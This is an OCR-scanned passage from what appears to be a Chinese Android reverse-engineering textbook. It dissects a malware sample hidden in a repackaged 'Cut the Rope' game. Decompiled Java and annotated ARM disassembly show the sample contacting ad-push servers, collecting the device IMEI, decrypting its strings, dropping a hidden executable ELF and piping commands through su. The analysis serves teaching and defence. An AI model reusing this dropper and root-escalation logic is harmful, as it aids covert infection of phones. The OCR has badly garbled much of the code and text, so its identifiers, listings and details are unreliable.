.method static synthetic bl(Lcom/tebs3/battery/NewAaAd;)V 
.locals 0 
invoke-direct {p0}, Lcom/tebs3/battery/NewAd;->al()V 
return-void 
.end method 
a() 方 法 实质 是 访问 NewAd 类 的 a 成 员 ， 该 变量 是 boolean 类 型 ， 初 始 
化 时 值 为 false， 因 此 循环 第 一 次 执行 时 第 一 个 if 语 句 不 会 返回 。b0) 方 法 
实质 是 调用 NewAd 类 的 a(0) 方 法 ， 它 的 主要 工作 是 访问 网 址 
http://dd.phonego8.com:7500/ad/nadp.php?v=1.5&id=all 并 解析 返回 的 结 
果 ， 根 据 不 同 的 结果 调用 不 同 的 方法 ， 并 设置 成 员 a 的 值 为 mue。 其 实 它 
的 功能 就 是 请 求 不 同 广告 商 的 Push 广 告 ， 具 体 的 代码 限于 篇 幅 此 处 不 再 
展开 。 
2. 局 动 全 局 定时 器 
启动 全 局 定时 器 的 代码 只 有 以 下 一 行 : 
new f(this); 


f 类 在 初始 化 时 执行 了 两 个 方法 ， 前 者 的 代码 为 : 





public void al(lActivity Paramactivity，boolean paramBoolean) 
{ 

1.a = paramBoolean; 

a = paramActivity; 

this.g = m.b(paramaActivity); 


Q = paramActivity.getSharedPreferences ("jmuser", 0); // 读 取 
SharedPreference 文 件 

d.edit() .putLong("dId"，this.g.l1ongValue() ) .commit() ; // 写 入 daId 的 值 

c localc = new c(this); / /实例 化 一 个 c 对 象 ， 继 承 自 AsyncTask 

Object[] arrayOfObject = new Object[3]; 

arrayOfObject[0] = null; 

arrayOfObject[1] = Integer.valueOf (0); 

arrayOfObject[2] = null; 


localc.execute(array0fObject); // 执 行 异步 操作 
} 
这 个 方法 主要 的 作用 是 获取 dId 与 userId 两 个 键 值 ， 然 后 通过 


SharedPreference 保 存 到 jmuser.xml 文 件 中 (文件 位 
于 /data/data/com.tebs3.cuttherope/shared_prefs 目 录 ) ，dId 的 值 来 源 于 
AndroidManifest.xml 中 的 元 数据 ad.imadpush.com， 它 的 值 固 定 为 
100001，userId 的 值 是 c 对 象 来 设置 的 ， 具 体 是 通过 访问 网 址 
http:/ad.imadpush.com:7500/AppManagervindex.php/userregisterregister 来 
获取 。 这 个 userId 用 来 标识 一 个 “合法 ”的 用 户 ， 每 个 感染 了 该 病毒 的 手 
机 通过 这 个 userId 来 获取 Push 广 告 。 

f 类 初始 化 时 执行 的 男 一 个 方法 为 静态 方法 b()， 它 的 代码 如 下 : 











private static void b() 


{ 


Intent localIntent = new Intent (a, ReceiverAlarm.class); 1/ 打算 启动 
ReceiverAlarm 

e = PendingIntent .getBroadcast(a, 0, localIintent, 0); // 构 造 一 个 
PendingIntent 对 象 


Calendar localCalendar = Calendar.getIinstance!(); 
localCalendar.setTimeInMillis(System.currentTimeMillis()); 

Date localDate = new Date(localCalendar.getTimeInMillis()); 

l.a(new SimpleDateFormat ("yyyy-MM-dd HH:mm:ss").format(localDate)); 
c = (AlarmManager)a.getSystemService("alarm"); / /获取 系统 定时 服务 
c.setRepeating(0, localCalendar.getTimeInMillis(), 360000L, e); 

// 启 动 定 时 器 


) 
b(0) 方 法 启动 了 一 个 全 局 定时 器 ， 对 象 为 ReceiverAlarm， 周 期 为 
360000 毫 秒 。ReceiverAjlarm 的 OnReceive() 方 法 只 有 一 行 代码 : 


ParamContext .startService (new Intent (paramContext, AlarmService.class)); 


这 行 代 人 码 只 是 启动 了 AlarmService 服 务 ， 我 们 再 来 看 看 AlarmService 
服务 的 OnStart0) 方 法 代码 : 


public void onStart (Intent paramIntent, int paramInt) 


{ 


} 


super.onSsStart (paramIntent, paramInt).; 

thaasd ss Tm 

this.e = Long.valueof (f.d.getLong ("userId", 0L)); 
this.g = Long.valueOof (f.d.getLong("dIid", 0L)); 
a / /该 方法 获取 系统 通知 服务 

g localg = new g(this); // AsyncTask 对 象 

Object [] arrayOfObject = new Object[3]; 
arrayOfObject[0] 
arrayOfObject[1] 
arrayOfObject[2] 
localg.execute (arrayOfobject); // 发 送 通 知 


null; 


Integer .valueof (0) ; 


Ti 二 -| 


服务 局 动 时 获取 了 系统 的 通知 服务 ， 然 后 调用 AsyncTask 的 execute 
来 回 用 户 发 送 通 知 ， 诱 骗 用 户 安 装 广告 软件 。 


3. 局 动 恶意 服务 

OnCreate() 方 法 最 后 通过 以 下 3 行 代码 局 动 了 一 个 恶意 的 服务 。 

Intent localIintent = new Intent () ; 

localIntent.setClass (this, UpdateCheck.class); 

startService(localIntent); 

启动 的 服务 名 称 为 UpdateCheck， 病 毒 的 主体 就 是 通过 它 来 启动 
的 。 下 面 我 们 来 看 看 该 服务 的 代码 ， 首 先是 如 下 语句 : 

static 


{ 





System.loadLibrary ("vadgo"); 
} 
UpdateCheck 服 务 加 载 了 一 个 原生 动态 链接 库 vadgo。 然 后 是 
OnCreate() 方 法 ， 它 的 代码 如 下 : 


public void onCreate!() 
{ 
super.onCreate(); 
try 
{ 
Object localObject = getPackageManager () .getApplicationInfo 


(getPackageName ()，128) .metaData.get ("MYAD_PID"); // 获 取 元 数据 MYAD_PID 
if (localObject != null) 
this.mch = ((String)localObject); 
this.mId = ((TelephonyManager)getSystemService("phone")) .getDeviceId!(); 
/ /获取 IMEI 
if (thismId ==" nn]1) 


this.mId = Settings.System.getstring (getContentResolver(), 


"android_id"):; 


this.mPkg = getPackageName (); / /获取 程序 包 名 
new UpdateCheck.1(this) .start();// 启 动 UpdateCheck .1 线程 
return; 


} 
catch (Exception localException) 
{ 
while (true) 
localException.printSstackTrace(); 
} 
} 


onCreate0 方 法 中 设置 了 mCh、mId、mPkg 共 3 个 成 员 变 量 ， 它 们 的 





值 分 别 是 元 数据 MYAD_PID (AndroidManifest.xml 中 值 为 
NCuttherope) 、 设 备 ID、 程 序 包 名 。 然 后 局 动 了 UpdateCheck.1 线 程 ， 
该 线程 的 run() 方 法 只 有 一 行 代码 : 


this.thiss0.DataInit(Upaatecheck .accesssSl (this.thiss$0), //mId 
UpdateCheck.access$2 {this.thiss$0), // moh 
UpdateCheck.access$0 (this.this$0)); // mpkg 


DatalInit() 方 法 定义 在 UpdateCheck 类 中 ， 它 是 一 个 Native 方 法 ， 有 3 
个 String 类 型 的 参数 。 代 码 中 传递 的 值 分 别 为 mId、mCh、 
mPkg (access$ 类 型 的 方法 在 jd-gui 中 无 法 但 看， 同样 需要 在 smali 文 件 中 
查找 相应 的 方法 代码 〉。 

当 DataInit(0) 方 法 执行 完毕 ， 病 毒 主体 就 算 真 正 激 活 了 。 也 就 是 从 这 
里 开始 ， 病 毒 的 代码 从 Java 层 进入 到 了 Native 层 ， 我 们 将 在 下 一 小 节 继 
续 分 析 。 


12.4.2 Native 层 启动 代码 分 析 





Java 层 的 DatalInit() 方 法 对 应 Native 层 的 
Java_com_airpuh_ad_UpdateCheck_DataInitO 函 数 ， 后 者 的 实现 代码 位 于 
libvadgo.so 文 件 中 ， 将 该 文件 拖 入 IDA Pro 窗 口中 ， 定 位 到 DataInitO 函 数 
的 起 始 代码 处 以 便 开 始 分 析 。DataInit0 函 数 主要 完成 功能 字符 串 解 密 、 
释放 病毒 主体 、 开 局 su 权限 管道 、 执 行 病毒 主体 等 几 项 工作 。 整 体 代码 
框架 如 下 : 


区 = 
ee 
:0000093C 


text 


.text: 
text:: 
"tert: 
:text: 
“texts 
:text: 
:让 全 把 攻 3 
.text: 
text: 
.text: 
“text: 
‘text:: 
text: 
“text: 
,a 
text: 
text: 
text: 


0000093C 
0000093C 


0000093C 
0000093C 
0000093C 
0000093C 
0000093E 
00000940 
00000942 
00000944 
00000946 
00000948 
0000094A 
0000094C 
0000094E 
00000950 
00000952 
00000954 
00000956 
00000958 


guard_ptr 


.text: 
‘text: 
:00000960 
:00000962 
:00000964 


0000095A 
0000095E 


:00000994 
:00000996 
:00000998 
:00000998 
:00000998 
:0000099C 
:0000099E 
:000009A0 


Java com airpuh ad UpdateCheck DataInit 


PUSH {R4- 
MOV RT 
MOV R6, 
MOV RS, 
MOV R4， 


PUSH {R4-R7} 


R7,LR} ; 将 R4-R7 寄 存 器 以 及 LR 寄存 器 的 值 压 入 堆栈 
RO=JNIEnv* 


; Rl1l=Jobject 


R2=mId (Android 设 备 ID) 

R3=mCh (META_DATA = NCuttherope) 

[SP] =mPkg〔 程 序 包 名 = "com.tebs3.cuttherope") 
R11 ; 以 下 4 行 保存 寄存 器 R8-R11 

R10 

R9 

R8 

将 R8-RI11L 寄 存 器 的 值 压 入 堆栈 


~ 


LDR RA, =0xFFFFFDE4 ; -0x21c 
MOVS Ry: WH ; "NCuttherope" 
LDR R3, =0x5C ; 相对 GOT 表 的 偏 移 
ADD SP，R4 ; 开辟 栈 空间 
LDR R4，=(_GLOBAL_OFFSET_TABLE。_- 0x95A) ;数据 存 取 的 基 址 
MOV R9, R3 
LDR R1, [SP,#0x240] ; 第 5 个 参数 , 也 就 是 原 [SP] = 程序 包 名 
ADD RA, PC 
LDR R3, [R4,R3] ; Ox10c8+0x5c = 0x1124 = __stack_chk_ 
MOVS R6, JNINativeInterface.GetSstringUTFChars 
LDR R3, [R3] ;__stack_chk_guara 的 值 
MOV R8, R1 
MOVS 2 ; Android 设 备 ID 
STR R3, [SP,#0x214] ; 保存 R3 寄 存 器 ， 用 于 堆栈 完整 性 检查 
BNE loc_998 ; 字符 串 解 密 
B goreturn 
loc_998 ; CODE XREF: .text:000009941j 
BL init predata  ; 字符 串 解密 
MOV R2, R10 ; 判断 Java 代 码 传递 过 来 的 META DRATR 是 否 为 空 
CMP R2, #0 
BNE extractelf 


.text:000009A2 B setR10 ; 如 果 R10 为 0 则 设置 R10 为 “self” 字 符 串 地 址 
.text:000009A4 


.text:000009A4 extractelf ; 释放 病毒 主体 

.text:00000A14 accesssu ; 检查 su 程序 的 路 径 
.text:00000A26 popensu ; 开启 su 权限 的 管道 
.text:00000A38 runcommand ; 执行 病毒 主体 

.text:00000B1C goreturn ; CODE XREF: .text:000009961j 
.text:00000B1C ; .text:00000B421|] 

.text:00000B1C MOV R2, R9 ; 读 取 原先 保存 的 R3 寄 存 器 的 值 


.text:00000B1E LDR R3, [R4,R2] ; 读 取 原先 __stack_chk_guard_ptr 的 值 
.text:00000B20 LDR R2， [SP,#0x214] ; 恢复 保存 的 寄存 器 R3 的 值 到 寄存 器 R2 中 


.text:00000B22 LDR R3, [R3] ; 读 取 原先 __stack_chk_guard 的 值 

.text:00000B24 CMP R2, R3 ; 判断 堆栈 上 __stack_chk_guard 的 值 是 否 
变化 

.text:00000B26 BNE checkstackfail ; 堆栈 检查 失败 

.text:00000B28 MOVS  R3, 0x21c ; 以 下 为 恢复 寄存 器 

.text:00000B2C ADD SP，R3 

.text:00000B2E POP {R2-R5} ;将 R8~R11 寄 存 器 的 值 弹 到 R2~R5 寄 存 器 中 

.text:00000B30 MOV R8，R2 ; 以 下 4 行 恢 复 R8~R11 寄 存 器 

.text:00000B32 MOV R9, R3 

.text:00000B34 MOV R10, R4 

.text:00000B36 MOV R11, RS5 

.text:00000B38 POP {RA4-R7, PC) ; 恢复 R4~R7 寄 存 器 ， 函 数 返 回 


上 面 的 代码 片断 保留 了 函数 的 开头 与 结尾 部 分 。 笔 者 打算 在 本 小 节 
中 讲解 一 下 函数 执行 现场 (执行 现场 指 的 是 处 理 器 执行 到 该 函数 时 各 寄 
存 器 的 值 ) 的 保护 与 恢复 ， 后 面 小 节 中 其 它 函 数 的 头 尾部 分 与 此 都 大 同 
小 异 ， 笔 者 将 不 再 花 时 间 对 其 进行 介绍 。 另 外 ， 注 意 上 面 的 注释 采用 的 
是 分 号 “开头 ， 这 是 IDA Pro 中 使 用 的 注释 方法 ， 自 己 手 工 编写 ARM 汇 
编 代码 时 ， 添 加 注释 需要 使 用 “@” 符 号。 








注意 
分 析 Native 层 的 代码 除了 需要 熟悉 ARM 指 令 集 外 ， 还 需要 读者 对 Linux 系 统 中 的 API 函 数 有 
所 了 解 ， 笔 者 在 分 析 病 毒 代码 时 ， 不 会 对 Linux 系 统 的 API 函 数 功能 进行 介绍 ， 如 果 读 者 对 此 不 














大 熟悉 ， 可 以 阅读 其 它 Linux 编 程 书籍 ， 或 者 直接 在 搜索 引擎 中 搜索 相关 API 函 数 的 参数 及 用 


途 。 























在 前 面 章节 的 学 习 中 我 们 知道 ， 寄 存 器 R0 一 R3 是 函数 的 前 4 个 参数 
寄存 器 ， 超 过 4 个 参数 的 函数 调用 使 用 堆栈 来 传递 ， 在 静态 分 析 原 生 程 
序 时 ， 我 们 无 法 得 知 寄存 器 在 某 一 点 时 的 值 ， 因 此 大 脑 中 时 刻 要 记 住 这 
4 个 寄存 器 所 代表 的 具体 参数 ， 最 好 的 方法 就 是 在 寄存 器 赋值 的 语句 上 
添加 注释 加 以 说 明 。 另 外 ， 寄 存 器 R4 一 R11 为 通用 寄存 器 ， 每 一 次 函数 
调用 都 可 能 改变 它们 中 一 个 或 多 个 的 值 ， 因 此 ， 在 使 用 它们 前 需要 先 保 
存 它们 的 值 ， 以 便 不 影响 到 函数 调用 时 的 中 间 结 果 。DatalInit() 函 数 保存 
函数 执行 现场 的 代码 如 下 : 








PUSH {RA4-R7, LR} ; 将 R4-R7 寄 存 器 以 及 LR 寄存 器 的 值 压 入 堆栈 
MOV RY “RE ; 以 下 4 行 保存 寄存 器 R8-R11 

MOV R6, R10 

MOV R5, R9 

MOV R4, R8 

PUSH {RA4-R7} ; 将 R8-R11 寄 存 器 的 值 压 入 堆栈 

LDR R4, =0xFFFFFDE4 ; -0x21c 

ADD SP，R4 ; 开辟 栈 空 间 


R4 一 R11 共 8 个 寄存 器 ， 分 2 次 压 入 了 堆栈 。 这 样 的 寄存 器 保护 方法 
在 分 析 其 它 原 生 方 法 时 经 常见 到 。 保 护 完 寄 存 髓 后 就 是 开辟 栈 空 间 ， 栈 
空间 是 用 来 做 什么 的 ?从 编程 的 角度 出 发 ， 每 个 函数 或 多 或 少 都 使 用 到 
了 临时 变量 ， 这 些 变量 是 怎么 存储 到 程序 中 的 呢 ? 答案 就 是 这 个 栈 空 间 
了 。 编 译 器 在 编译 程序 代码 时 ， 计 算 所 有 临时 变量 占用 的 空间 大 小 并 以 
4 字 节 对 齐 取 整 (不 同 编译 器 的 计算 方法 可 能 有 所 不 同 ) ， 然 后 在 函数 
代码 开头 插入 类 似 “*ADD SP，<- 空 间 大 小 >” 的 指令 ， 所 有 变量 的 读 写 操 
作 都 是 在 “SP- 空 间 大 小 ”一 SP 之 间 的 存储 单元 中 完成 。 

本 实例 开辟 栈 空间 的 代码 是 “ADD SP，R4”，R4 被 指定 为 一 个 负数 




















0xFFFFFDE4， 它 的 值 就 是 -0x21c， 因 此 ， 以 下 两 行 代码 也 可 以 达到 同 





样 的 效果 。 
MOV R4, #0x21c 
SUB SP, R4 
在 函数 执行 完 返 回 时 需要 恢复 原先 寄存 器 的 值 ， 代 人 码 如 下 : 
MOVS R3, 0x21c ; 栈 空间 大 小 
ADD SP, R3 ; 恢复 SP 寄存 器 的 值 
POP {R2-R5} ; 将 R8~R11 寄 存 器 的 值 恢复 到 R2~R5 寄 存 器 中 
MOV R8, R2 ; 以 下 4 行 恢 复 R8~R11 寄 存 器 
MOV R9, R3 
MOV R10, R4 
MOV 到 二 二 RS 
POP {R4-R7, PC} ;恢复 R4~R7 寄 存 器 ， 图 数 返 回 


函数 执行 现场 的 保存 与 恢复 是 截然 相反 的 两 个 操作 ， 这 些 代码 在 分 
析 Android 原 生 程序 时 随处 可 见 ， 因 此 读者 必须 要 理解 其 具体 含义 。 
在 保护 完 寄 存 器 的 值 后 ， 是 如 下 的 代码 : 





LDR R4, =(_GLOBAL OFFSET TABLE_ - 0x95A) ; R4 作 为 数据 存 取 的 基 址 =0x10c8 
ADD R4, PC 
LDR R3, [R4,R3] 7 MRLOGSTONSG EE OL124 = Stacek hk quared Str 


STR R3， [SP,#0x214] ;保存 R3 寄 存 器 ， 用 于 堆栈 完整 性 检查 


日 令 “LDR R3， [R4,R3 了 "执行 后 R3 寄 存 器 的 值 为 0x10c8+0x5c = 
0x1124， 此 处 存放 的 是 一 个 __stack_chk_guard_ptr 指 针 ， 该 指针 指 问 
_ stack_chk_guard， 那 这 个 _ stack_chk_guard 又 是 个 什么 东西 ? 其 实 它 
是 gcc 编 译 器 的 堆栈 保护 技术 (GCC Stack Smashing Protector) 的 一 部 
分 ， 软 件 安全 技术 中 有 一 种 攻击 方式 叫 堆 栈 洲 出 ， 这 种 攻击 方式 表现 
为 : 程序 受到 攻击 后 ， 堆 栈 被 填充 为 一 些 精心 构造 的 恶意 数据 ， 函 数 在 
返回 时 由 于 寄存 器 的 值 遭 到 算 改 从 而 跳 转 执行 恶意 代码 。 为 了 防止 这 种 
攻击 ，gcc 编 译 器 提供 了 -fstack-protector-all 选 项 ， 当 编译 程序 时 加 上 该 
选项 ， 生 成 的 代码 就 会 被 添加 上 堆栈 保护 代码 ， 其 中 之 一 便 是 


stack_chk_guard。_ stack_chk_guard 并 不 是 什么 神奇 的 东西 ， 它 只 是 
一 个 void 类 型 的 指针 。 在 Android 系 统 源码 的 bionicNibcvbionic\ssp.c 文 件 
中 可 以 看 到 其 实现 机 制 。 它 的 值 是 由 guard_setup0O 函 数 设置 的 ， 其 值 
是 由 /dewurandom 设 备 生 成 的 一 个 随机 数 。 

上 面 的 代码 读 取 了 __stack_chk_guard 的 值 并 将 它 保 存 到 SP 寄存 器 相 
对 偏 移 0x214 的 位 置 ， 我 们 再 看 看 疯 数 返回 时 相应 的 处 理 代码 : 


goreturn ; CODE XREF: .text:000009961] 
; .text:00000B421]j 
MOV R2, R9 ; 读 取 原先 保存 的 R3 寄 存 旧 的 值 
LDR RI [RAR ; 读 取 原先 __stack_chk_guard_ptr 的 值 
LDR R2， [SP,#0x214] ; 恢复 保存 的 寄存 器 R3 的 值 到 寄存 器 R2 中 
LDR R3, [R3] ; 读 取 原先 __stack_chk_guard 的 值 
CMP R2, R3 ; 判断 堆栈 上 __stack_chk_guard 的 值 是 否 变化 
BNE checkstackfail ; 堆栈 检查 失败 


函数 返回 时 重新 恋 取 堆栈 上 0x214 处 的 值 并 与 原先 
_ stack_chk_guard 的 值 进行 比较 ， 如 果 两 个 值 不 相同 ， 说 明 堆 栈 此 时 已 
经 不 “纯洁 ”了 ， 这 个 时 候 束 会 跳 转 到 checkstackfail 处 去 执行 ， 该 处 主要 
调用 了 gcc 编 译 器 插入 的 _ stack_chk_fail0 消 数 ， 该 函数 是 一 个 扫尾 函 
数 ， 具 体 的 工作 是 阻塞 程序 中 所 有 的 信号 处 理 占 、 输 出 堆栈 错误 信息 ， 
最 后 中 止 进程 运行 。 

介绍 完 函 数 执行 现场 保护 与 堆栈 保护 后 ， 正 式 进 入 病毒 功能 代码 分 
析 。 

1. 功能 字符 串 解 密 

当 堆 栈 保护 设置 完毕 后 ，DataInitO 调 用 了 init_predata0 函 数 ， 该 函 
数 主要 完成 字符 串 数 据 的 解密 ,，“ 狭 猎 ” 的 病毒 作者 将 程序 中 所 有 使 用 到 
字符 串 都 进行 了 加 密 ， 在 程序 运行 时 动态 的 解密 ， 下 面 我 们 来 看 看 这 
解密 函数 : 

















> 辟 


.text:00000894 init predata ; 该 函数 解密 6 小 段 字 符 串 


.text:00000894 LDR R1, =(_GLOBAL_OFFSET_TABLE_ - 0x89C) ;R1 指 向 GOT 首 
地 址 

.text:00000896 LDR R3, =(_ data start_ptr - 0x10C8) ;R3 指 向 _ data_ 
start_ptr 

.text:00000898 ADD R1, PC 

.text:0000089A LDR R3, [R1,R3] 

.text:0000089C LDRB R2, [R3] ; 取 1 个 字 节 的 数据 

.text:0000089E CMP R2, #0 ; 不 为 0 就 进行 循环 解密 

.text:000008A0 BEQ loc_8AE 

.text:000008A2 

.text:000008A2 decrypt1 ; CODE XREF: init predata+18|j 
.text:000008A2 MVNS R2, R2 ; 字 节 取 反 

.text:000008A4 STRB R2, [R3] ; 重新 写 回 去 

.text:000008A6 ADDS R3, #1 ; 移动 指针 

.text:000008A8 LDRB R2, [R3] ; 取 下 一 个 字 节 

.text:000008AA CMP R2, #0 ; 循环 判断 

.text:000008AC BNE decrypt1 ; 第 一 处 的 8c 9a 93 99 解 密 后 为 73 65 6c 66， 
.text:000008AC ; 也 就 是 字符 串 self。 


.text:000008AC 下 面 decryptx 都 是 采用 同样 的 解密 手法 


.text:000008AE 


.text:000008AE loc_8AE ; CODE XREF: init_ predata+C1]j 
.text:000008AE LDR R3, =(SYS_BIN_ SU ptr - 0x10C8) 
.text:000008B0 LDR Ra [RE; 人 ES] 

decrypt6 ; CODE XREF: init_ predata+86|]j 
.text:0000091A BNE 0 ; 解密 后 的 字符 串 为 r0 .bot.ch 
.text:0000091C BX ; 函数 返回 


代码 第 1 行将 GOT 的 首 地 址 赋 给 了 RI 寄存 器， 第 2 一 4 行 获取 
_ data_start 加 密 字符 串 的 地 址 ， 第 5 行 的 5LDRB R2, [R3]? 读 取 1 个 字 节 ， 
如 有 果 不 为 0 就 进入 decrypt1l 标 号 处 开始 循环 解密 ， 整 个 解密 的 过 程 简 单 到 
了 “单薄 *"， 只 有 一 行 关 键 代码 “MVNS R2，R2”， 作 用 是 对 字 节 取 反 ， 然 
后 下 一 行 “STRB R2, [R3]” 将 解密 后 的 数据 写 回去 。 

接 下 来 我 们 动手 还 原 加 密 字 符 串 ， 笔 者 在 此 使 用 了 C 代 码 +ARM 汇 
编 代码 的 方式 编写 了 一 个 小 程序 来 完成 解密 ， 上 有 具体 的 代码 读者 可 以 参看 
本 书 配 套 源 代码 的 本 小 节 的 decrypt 工 程 源码 。IDA Pro 支持 通过 编写 脚 
本 的 方式 来 扩展 静态 分 析 功 能 ， 如 编写 代码 解密 脚本 ， 这 样 大 大 地 方便 











了 分 析 人 员 ， 笔 者 在 网 上 找到 了 另外 一 个 分 析 人 员 编 写 的 LeNa 病 毒 

(实际 为 DroidKongFu 变 种 病毒 ) 相应 的 字符 串 解 密 脚 本 ， 下 载 地 址 为 
https://github.com/strazzere/LeNa-Decryption-Script。 具 体 的 使 用 方法 是 点 
击 IDA Pro 羔 单项 “File ~ Script file”， 选 择 下 载 的 LeNa-decryption.idc 脚 本 
文件 ， 然 后 将 鼠标 定位 到 需要 解密 的 字符 串 所 在 的 行 ， 如 
_ data_start_ptr 所 在 的 行 〈 笔 者 本 机 位 于 0x113c 文 件 俩 移 处 ) ， 按 下 键 
盘 上 的 笠 杠 “”， 此 时 解密 脚本 便 会 运行 ， 并 会 将 解密 后 的 字符 串 以 注释 
的 方式 添加 到 字符 串 交 叉 引 用 处 《交叉 引用 的 含义 以 及 如 何 通过 交叉 引 
用 定位 函数 调用 ， 可 以 参看 《IDA Pro 权威 指南 》 一 书 ) ， 程 序 中 共 使 
用 到 了 6 行 字 符 串 ， 这 些 字 符 串 解密 后 的 效果 如 图 12-9 所 示 。 


IDA - /home/feicong/virus/lib/armeabi/libvadgo.so 
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Function name 120 PROP_RUNNING_ID_ptr DCD PROP_RUNNING_ID ATA XREF a+5Eir 
py 120 text :orff 
类 access 120 ; Leorypted value r0.bot .id 
因 strlen 124 __stack_chk guard ptr DCD _ stack chk guard 
pal open 123 bindata ptr DCD _bindata 
a p 12C CMD_sET_ PROP ptr DCD CMD_SET _ PROP CATA XPREF init precat a+4SfTz 
f| close 12C te o 
py > 2C /system/bin/setprop 
回 init_predata 130 PROP_RUNNING CH_prr DCD PROP_RUNNTNG_CH sata+T4Tr 
F| _imp_popen 130 
一 ， 130 
加 一 imp_pclose 134 SYS_BIN_SU_ptr DCD SYS_BIN_SU 
If| _aeabi unwind_cpp. 134 
Pr ， 134 ystem/bin/su 
. 一 imp_sleep 133 SYS_XBIN SU ptr DCD SYS_XBIN_S0 ata r 
因 _imp_fflush 138 
Pm 138 /system/xbin/su 
a —imp__stack_chk_F. 13C data start ptr DCD data start cata+6fTr 
f| _imp_chmod 13C 
pa imp write 13C got ends self 
和 1 < 过 -二 

:not found 
目 output window 回 
DECIYPCEC string: 7SVSCET7DIT7SETDYDE 

d string: I0.bot .ch 

i string: /system/bir/su 


i string: /system/xbin/su 
Necrypten string: sP1Ff | 


Decrypted string: r0.bot.id 





IDC | 





图 12-9 ”使 用 LeNa-decryption 脚 本 解密 字符 串 


至 此 ， 功 能 字符 串 的 解密 就 介绍 完了 。 
2. 释放 病毒 主体 
init_predata0) 函 数 执行 完 后 ， 执 行 了 以 下 4 行 代码 : 


.text:0000099C MOV R2, R10 ; 判断 Java 代 码 传 递 过 来 的 元 数据 字符 串 是 否 为 空 





,text:0000099E CMP R2, #0 
.text:000009A0 BNE extractelf ; 释放 病毒 主体 
.text:000009A2 setR10 ; 如 果 R10 为 0 则 设置 R10 为 “self” 字 符 串 地 址 


R10 寄存 器 是 Java 代 码 传递 过 来 的 元 数据 字符 囊 ， 取 值 为 
MYAD_PID 的 “NCuttherope”， 因 此 下 面 的 BNE 跳 转 会 成 功 ， 如 果 这 里 
传 入 字符 串 为 空 ， 则 会 跳 转 到 setR10 处 执行 ， 功 能 是 设置 R10 寄存 器 的 
值 为 解密 后 的 “self” 字 符 串 ， 设 置 完成 后 同样 会 跳 转 到 extractelf 标 号 处 执 
行 病毒 体 的 释放 工作 ，extractelf 标 号 处 的 代码 如 下 : 


.text:000009A4 extractelf ; CODE XREF: .text:000009A01j 
.text:000009A4 ; .text:00000B5A|j 
.text:000009A4 ADD R6, SP, #0x14 

.text:000009A6 MOVSs R2, #0x80 

.text:000009A8 MOVS R1, #0 ; 填 0 

.text:000009AA LSLS  R2，R2，#1; 要 填 入 的 长 度 0x80*2 = 0x100 
.text:000009AC MOVS RO, R6 ; 缓冲 区 

.text:000009AE BLX memset ; 清空 一 个 存储 空间 用 来 存 入 sprzintf 组 成 的 字符 串 
.text:000009B2 ADD RO, SP, #0x10 

.text:000009B4 BLX time ; 获取 系统 时 间作 为 随机 种 子 
.text:000009B8 LDR RO, [SP,#0x10] 

.text:000009BA BLX srand48 

.text:000009BE BLX lrand48 ; 生成 的 随机 数 作为 释放 的 恶意 程序 的 文件 名 
.text:000009C2 LDR R1, =(aSss_eDd - 0x9CC) 

.text:000009C4 LDR R2, =(aDataData - 0x9CE) 

.text:000009c6 STR RO, [SP] 

.text:000009C8 ADD 人 ; "Ss/$s/.esdd" 

.text:000009CA ADD PE ; "/data/data" 

.text:000009CC MOVS RO, R6 ; 前 面 memset 的 缓冲 区 
.text:000009CE MOVS  R3, R5 ; 程序 包 名 

.text:000009D0 BLX sprintf ; 构造 字符 串 
/data/data/com.tebs3.cuttherope/.e 随 机 数 a 

.text:000009D4 MOVS R2, #0xC0 

.text:000009D6 MOVS RO, R6 ; 文件 名 

.text:000009D8 LDR Ri; =0x242 ; flag 

.text:000009DA LSLS  R2, R2, #1 

.text:000009DC BLX open ; 创建 恶意 文件 

.text:000009E0 SUBS RI7, RO, #0 ”文件 fa 

.text:000009E2 BGE loc_9E6 ; 创建 成 功 

.text:000009E4 B gounlink 

.text:000009E6 loc_986 ; CODE XREF: .text:000009E21j 
.text:000009E6 LDR R3, =0x60 ; 相对 GOT 表 的 偏 移 
.text:000009E8 MOVS RO, R7 ; 文件 fa 

.text:000009EA LDR R1, [ER4,R3] ; Oxl0c8+0x60 = 0x1128 = _ bindata ptr 
.text:000009EC LDR R3，=(_ bindata+0x5808) ; 文件 的 长 度 为 0x699c = 27036 字 节 
.text:000009EE ”MOVS  R2, R3 ; 写 入 的 长 度 

.text:000009F0 MOV R8, R3 

.text:000009F2 BLX write ; 写 入 恶意 文件 

.text:000009F6 MOVS R5, RO ; 实际 写 入 的 长 度 

.text:000009F8 MOVS RO, R7 ; 文件 fa 

.text:000009FA BLX close ; 关闭 文件 

.text:000009FE BLX sync ; 强制 刷新 

.text:00000A02 BLX Sync ; 强制 刷新 

.text:00000A06 ”MOVS RO, R6 ; 文件 名 

.text:00000A08 LDR R1, =0X1ED 2 

.text:00000A0A BLX chmod ; 加 上 可 执行 权限 

.text:00000A0E CMP R5, R8 ; 比较 写 入 的 长 度 是 否 正 确 
.text:00000A10 BEQ accesssu ; 相对 GoT 表 的 偏 移 
.text:00000A12 B gounlink 


代码 首先 在 0x9AE 行 调用 memset() 函 数 十 0 了 一 块 内 存 区 域 ， 这 块 区 
域 用 来 存 入 将 要 生成 的 随机 病毒 文件 名 。time() 函 数 用 来 获取 系统 时 
间 ， 这 里 用 它 作为 生成 文件 名 的 随机 种 和子 ， 接 下 来 调用 了 lrand480 函 数 
生成 随机 数 ， 病 毒 在 生成 随机 文件 名 时 采用 “.e< 随 机 数 >d” 的 方式 命 
名 ， 文 件 名 最 前 面 加 上 了 点 “.”， 这 样 生成 的 文件 即 为 隐藏 文件 ， 因 此 直 
接 通过 DDMS 是 无 法 看 到 病毒 文件 的 ， 需 要 在 adb shell 下 通过 “ls -a” 进 行 
人 查看。 使 用 sprintf 构 造 好 完整 的 病毒 文件 路 符 后 ， 调 用 open0 〇 函数 创建 
了 病毒 文件 ， 接 着 调用 write0) 函 数 写 文件 ， 号 的 内 容 的 起 始 地 址 为 
_bindata_ptr， 该 指针 指向 _bindata 〈 文 件 偏 移 为 0x1194) ， 在 IDA Pro 
中 跳 转 到 该 地 址 进行 查看 ， 发 现 此 处 开始 的 前 4 个 字 节 为 “7F 45 4C 
46”， 这 不 正 是 Android 原 生 文 件 的 有 效 标识 吗 ? ! 再 看 写 入 的 长 度 : 
bindata (0x1194) + 0x5808 = 0x699c = 27036 字 节 。 文 件 写 完 后 依次 
是 close0 函 数 关 闭 文件 、sync0O 函 数 强 制 刷 新 、chmod0 函 数 添加 执行 权 
限 ， 整 个 过 程 简 单 而 不 需要 额外 的 解释 。 

病毒 发 作 后 ， 在 adb shell 下 通过 “ls -a” 依 然 无 法 找到 生成 的 病毒 主 
